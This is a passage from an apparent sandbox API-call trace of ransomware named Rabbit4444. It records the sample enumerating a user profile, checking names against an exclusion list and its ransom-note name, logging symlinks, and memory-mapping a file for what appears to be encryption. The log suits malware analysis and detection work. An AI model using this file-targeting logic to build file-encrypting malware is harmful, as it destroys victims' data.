(lpFileName="C:\\Users\\Default\\Local Settings", dwFileAttributes=0x2412) returned 1 [0060.367] wsprintfA (in: param_1=0x11ce360, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\Default\\Local Settings\r\n") returned 50 [0060.367] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\Default\\Local Settings\r\n") returned 50 [0060.367] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0060.367] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc2f [0060.367] WriteFile (in: hFile=0x260, lpBuffer=0x11ce360*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x11cdb1c, lpOverlapped=0x0 | out: lpBuffer=0x11ce360*, lpNumberOfBytesWritten=0x11cdb1c*=0x32, lpOverlapped=0x0) returned 1 [0060.369] CloseHandle (hObject=0x260) returned 1 [0060.369] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbaa63, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0060.369] lstrcmpiW (lpString1="Music", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.369] lstrcmpiW (lpString1="Music", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.369] lstrcmpiW (lpString1="Music", lpString2="Rabbit4444.exe") returned -1 [0060.369] lstrcmpiW (lpString1="Music", lpString2=".") returned 1 [0060.369] lstrcmpiW (lpString1="Music", lpString2="..") returned 1 [0060.369] lstrcmpiW (lpString1="Music", lpString2="windows") returned -1 [0060.369] lstrcmpiW (lpString1="Music", lpString2="bootmgr") returned 1 [0060.369] lstrcmpiW (lpString1="Music", lpString2="pagefile.sys") returned -1 [0060.370] lstrcmpiW (lpString1="Music", lpString2="boot") returned 1 [0060.370] lstrcmpiW (lpString1="Music", lpString2="ids.txt") returned 1 [0060.370] lstrcmpiW (lpString1="Music", lpString2="NTUSER.DAT") returned -1 [0060.370] lstrcpyW (in: lpString1=0x11ceb82, lpString2="Music" | out: lpString1="Music") returned="Music" [0060.370] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Music", dwFileAttributes=0x10) returned 1 [0060.370] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122260 [0060.370] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x2e) returned 0xf7530 [0060.370] RtlInterlockedPushEntrySList (in: ListHead=0x122128, ListEntry=0x122268 | out: ListHead=0x122128, ListEntry=0x122268) returned 0x1221e8 [0060.370] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0060.370] lstrcmpiW (lpString1="My Documents", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.370] lstrcmpiW (lpString1="My Documents", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.370] lstrcmpiW (lpString1="My Documents", lpString2="Rabbit4444.exe") returned -1 [0060.370] lstrcmpiW (lpString1="My Documents", lpString2=".") returned 1 [0060.371] lstrcmpiW (lpString1="My Documents", lpString2="..") returned 1 [0060.371] lstrcmpiW (lpString1="My Documents", lpString2="windows") returned -1 [0060.371] lstrcmpiW (lpString1="My Documents", lpString2="bootmgr") returned 1 [0060.371] lstrcmpiW (lpString1="My Documents", lpString2="pagefile.sys") returned -1 [0060.371] lstrcmpiW (lpString1="My Documents", lpString2="boot") returned 1 [0060.371] lstrcmpiW (lpString1="My Documents", lpString2="ids.txt") returned 1 [0060.371] lstrcmpiW (lpString1="My Documents", lpString2="NTUSER.DAT") returned -1 [0060.371] lstrcpyW (in: lpString1=0x11ceb82, lpString2="My Documents" | out: lpString1="My Documents") returned="My Documents" [0060.371] SetFileAttributesW (lpFileName="C:\\Users\\Default\\My Documents", dwFileAttributes=0x2412) returned 1 [0060.371] wsprintfA (in: param_1=0x11ce360, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\Default\\My Documents\r\n") returned 48 [0060.371] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\Default\\My Documents\r\n") returned 48 [0060.371] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0060.371] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc61 [0060.371] WriteFile (in: hFile=0x260, lpBuffer=0x11ce360*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x11cdb1c, lpOverlapped=0x0 | out: lpBuffer=0x11ce360*, lpNumberOfBytesWritten=0x11cdb1c*=0x30, lpOverlapped=0x0) returned 1 [0060.373] CloseHandle (hObject=0x260) returned 1 [0060.373] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0060.373] lstrcmpiW (lpString1="NetHood", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.373] lstrcmpiW (lpString1="NetHood", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.373] lstrcmpiW (lpString1="NetHood", lpString2="Rabbit4444.exe") returned -1 [0060.373] lstrcmpiW (lpString1="NetHood", lpString2=".") returned 1 [0060.373] lstrcmpiW (lpString1="NetHood", lpString2="..") returned 1 [0060.373] lstrcmpiW (lpString1="NetHood", lpString2="windows") returned -1 [0060.373] lstrcmpiW (lpString1="NetHood", lpString2="bootmgr") returned 1 [0060.373] lstrcmpiW (lpString1="NetHood", lpString2="pagefile.sys") returned -1 [0060.373] lstrcmpiW (lpString1="NetHood", lpString2="boot") returned 1 [0060.374] lstrcmpiW (lpString1="NetHood", lpString2="ids.txt") returned 1 [0060.374] lstrcmpiW (lpString1="NetHood", lpString2="NTUSER.DAT") returned -1 [0060.374] lstrcpyW (in: lpString1=0x11ceb82, lpString2="NetHood" | out: lpString1="NetHood") returned="NetHood" [0060.374] SetFileAttributesW (lpFileName="C:\\Users\\Default\\NetHood", dwFileAttributes=0x2412) returned 1 [0060.374] wsprintfA (in: param_1=0x11ce360, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\Default\\NetHood\r\n") returned 43 [0060.374] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\Default\\NetHood\r\n") returned 43 [0060.374] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0060.374] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc91 [0060.374] WriteFile (in: hFile=0x260, lpBuffer=0x11ce360*, nNumberOfBytesToWrite=0x2b, lpNumberOfBytesWritten=0x11cdb1c, lpOverlapped=0x0 | out: lpBuffer=0x11ce360*, lpNumberOfBytesWritten=0x11cdb1c*=0x2b, lpOverlapped=0x0) returned 1 [0060.375] CloseHandle (hObject=0x260) returned 1 [0060.376] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c4aac40, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x7a4c27fa, ftLastAccessTime.dwHighDateTime=0x1d327be, ftLastWriteTime.dwLowDateTime=0x7a4c27fa, ftLastWriteTime.dwHighDateTime=0x1d327be, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0060.376] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.376] lstrcmpiW (lpString1="NTUSER.DAT", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.376] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="Rabbit4444.exe") returned -1 [0060.376] lstrcmpiW (lpString1="NTUSER.DAT", lpString2=".") returned 1 [0060.376] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="..") returned 1 [0060.376] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="windows") returned -1 [0060.376] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="bootmgr") returned 1 [0060.376] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="pagefile.sys") returned -1 [0060.376] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="boot") returned 1 [0060.377] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="ids.txt") returned 1 [0060.377] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="NTUSER.DAT") returned 0 [0060.377] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c6021fd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x6c6021fd, ftLastAccessTime.dwHighDateTime=0x1d29fdc, ftLastWriteTime.dwLowDateTime=0x6c6021fd, ftLastWriteTime.dwHighDateTime=0x1d29fdc, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0060.377] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.377] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.377] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="Rabbit4444.exe") returned -1 [0060.377] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2=".") returned 1 [0060.378] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="..") returned 1 [0060.378] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="windows") returned -1 [0060.378] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="bootmgr") returned 1 [0060.378] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="pagefile.sys") returned -1 [0060.378] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="boot") returned 1 [0060.378] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="ids.txt") returned 1 [0060.378] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="NTUSER.DAT") returned 1 [0060.378] lstrcpyW (in: lpString1=0x11ceb82, lpString2="NTUSER.DAT.LOG1" | out: lpString1="NTUSER.DAT.LOG1") returned="NTUSER.DAT.LOG1" [0060.378] SetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG1", dwFileAttributes=0x22) returned 1 [0060.378] SetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG1", dwFileAttributes=0x6) returned 1 [0060.378] lstrlenW (lpString="NTUSER.DAT.LOG1") returned 15 [0060.378] lstrlenW (lpString="Rabbit4444") returned 10 [0060.378] lstrcmpiW (lpString1="R.DAT.LOG1", lpString2="Rabbit4444") returned -1 [0060.378] lstrlenW (lpString=".dll") returned 4 [0060.378] lstrcmpiW (lpString1="LOG1", lpString2=".dll") returned 1 [0060.378] lstrlenW (lpString=".lnk") returned 4 [0060.378] lstrcmpiW (lpString1="LOG1", lpString2=".lnk") returned 1 [0060.378] lstrlenW (lpString=".ini") returned 4 [0060.378] lstrcmpiW (lpString1="LOG1", lpString2=".ini") returned 1 [0060.378] lstrlenW (lpString=".sys") returned 4 [0060.379] lstrcmpiW (lpString1="LOG1", lpString2=".sys") returned 1 [0060.379] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0060.379] QueryPerformanceFrequency (in: lpFrequency=0x11cbfe0 | out: lpFrequency=0x11cbfe0*=100000000) returned 1 [0060.379] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbfe8 | out: lpPerformanceCount=0x11cbfe8*=15168954042) returned 1 [0060.379] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x11cc040 | out: lpFileSize=0x11cc040*=32768) returned 1 [0060.379] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0060.379] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0060.379] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8300, lpName=0x0) returned 0x29c [0060.380] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8300) returned 0x70000 [0060.388] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x127050 [0060.388] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0060.388] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x127050 | out: hHeap=0xe0000) returned 1 [0060.388] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0060.388] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x127050 [0060.388] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0x1054d0 [0060.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x204) returned 0x127260 [0060.389] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0060.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x204) returned 0x127470 [0060.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x127680 [0060.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x20c) returned 0x127788 [0060.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0060.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103cc8 [0060.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0060.389] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x127680 | out: hHeap=0xe0000) returned 1 [0060.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x204) returned 0x1279a0 [0060.389] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0060.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054c0 [0060.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103b18 [0060.389] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0060.389] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054c0 | out: hHeap=0xe0000) returned 1 [0060.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0060.389] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0060.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x108) returned 0x109028 [0060.389] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103b18 | out: hHeap=0xe0000) returned 1 [0060.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x204) returned 0x127bb0 [0060.389] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0060.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105510 [0060.389] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105510 | out: hHeap=0xe0000) returned 1 [0060.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105540 [0060.389] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105540 | out: hHeap=0xe0000) returned 1 [0060.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0060.389] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0060.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105430 [0060.389] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105430 | out: hHeap=0xe0000) returned 1 [0060.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105540 [0060.389] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105540 | out: hHeap=0xe0000) returned 1 [0060.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105410 [0060.389] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105410 | out: hHeap=0xe0000) returned 1 [0060.389] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105540 [0060.390] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105540 | out: hHeap=0xe0000) returned 1 [0060.390] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105440 [0060.390] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105440 | out: hHeap=0xe0000) returned 1 [0060.390] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0060.390] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0060.390] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105470 [0060.390] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105470 | out: hHeap=0xe0000) returned 1 [0060.390] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0060.390] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0060.390] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105550 [0060.390] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105550 | out: hHeap=0xe0000) returned 1 [0060.390] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105440 [0060.390] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105440 | out: hHeap=0xe0000) returned 1 [0060.390] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0060.390] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0060.390] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105450 [0060.390] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105450 | out: hHeap=0xe0000) returned 1 [0060.390] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0060.390] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0060.390] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105520 [0060.390] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105520 | out: hHeap=0xe0000) returned 1 [0060.390] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0060.390] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0060.390] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054b0 [0060.390] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054b0 | out: hHeap=0xe0000) returned 1 [0060.390] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055a0 [0060.390] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055a0 | out: hHeap=0xe0000) returned 1 [0060.390] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105540 [0060.390] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105540 | out: hHeap=0xe0000) returned 1 [0060.390] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105580 [0060.390] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105580 | out: hHeap=0xe0000) returned 1 [0060.390] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105550 [0060.390] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105550 | out: hHeap=0xe0000) returned 1 [0060.390] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105410 [0060.390] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105410 | out: hHeap=0xe0000) returned 1 [0060.391] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055a0 [0060.391] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055a0 | out: hHeap=0xe0000) returned 1 [0060.391] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105580 [0060.391] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105580 | out: hHeap=0xe0000) returned 1 [0060.391] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105480 [0060.391] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105480 | out: hHeap=0xe0000) returned 1 [0060.391] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0060.391] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0060.391] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105520 [0060.391] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105520 | out: hHeap=0xe0000) returned 1 [0060.391] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105450 [0060.391] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105450 | out: hHeap=0xe0000) returned 1 [0060.391] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055b0 [0060.391] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055b0 | out: hHeap=0xe0000) returned 1 [0060.391] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054f0 [0060.391] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054f0 | out: hHeap=0xe0000) returned 1 [0060.391] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105510 [0060.391] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105510 | out: hHeap=0xe0000) returned 1 [0060.391] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054e0 [0060.391] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054e0 | out: hHeap=0xe0000) returned 1 [0060.391] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105510 [0060.391] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105510 | out: hHeap=0xe0000) returned 1 [0060.391] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105470 [0060.391] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105470 | out: hHeap=0xe0000) returned 1 [0060.391] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054a0 [0060.391] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054a0 | out: hHeap=0xe0000) returned 1 [0060.391] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105470 [0060.391] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105470 | out: hHeap=0xe0000) returned 1 [0060.391] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105520 [0060.391] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105520 | out: hHeap=0xe0000) returned 1 [0060.391] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105540 [0060.391] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105540 | out: hHeap=0xe0000) returned 1 [0060.391] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105440 [0060.391] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105440 | out: hHeap=0xe0000) returned 1 [0060.391] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054f0 [0060.392] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054f0 | out: hHeap=0xe0000) returned 1 [0060.392] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0060.392] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0060.392] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055d0 [0060.392] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055d0 | out: hHeap=0xe0000) returned 1 [0060.392] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105520 [0060.392] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105520 | out: hHeap=0xe0000) returned 1 [0060.392] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054a0 [0060.392] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054a0 | out: hHeap=0xe0000) returned 1 [0060.392] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055a0 [0060.392] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055a0 | out: hHeap=0xe0000) returned 1 [0060.392] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0060.392] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0060.392] 